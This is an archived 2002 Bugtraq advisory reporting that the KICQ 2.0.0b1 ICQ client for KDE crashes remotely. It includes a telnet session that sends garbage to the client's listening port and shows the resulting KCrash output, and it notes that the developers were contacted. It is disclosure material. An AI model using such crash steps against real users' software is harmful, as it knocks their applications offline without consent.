[24073] in bugtraq
KICQ 2.0.0b1 can be remotely crashed
daemon@ATHENA.MIT.EDU (_kiss_@guay.com)
Sat Feb 2 12:03:58 2002
Message-ID: <3163169.1012601414791.JavaMail.nobody@aldebaran.guay.com>
Date: Fri, 1 Feb 2002 23:10:14 +0100 (CET)
From: _kiss_@guay.com
To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_Part_377_4512178.1012601414788"
------=_Part_377_4512178.1012601414788
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
KICQ is an ICQ client, specifically designed for the KDE.
Versions affected:
KICQ 2.0.0b1 using icqlib 1.0.0
Description
KICQ can be remotely crashed in a very simple way. Just telnet the machine on wich KICQ is running on the port it's bound and feed some garbage.
bash-2.05$ telnet 10.0.0.1 1030
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
garbage
Connection closed by foreign host.
KDE Crash handler window appears and something like this goes in the console:
KCrash: crashing.... crashRecursionCounter = 2
KCrash: Application Name = kicq path = <unknown>
I have tried to find where in the code the error ocurrs, but the exact place seems to change every time I execute KICQ.
Solution
I have contacted the developers and hope a patch is released soon.
More information: sourceforge.net/projects/kicq
Rafael San Miguel Carrasco (_kiss_)
rsanmcar@alum.uax.es
------=_Part_377_4512178.1012601414788--
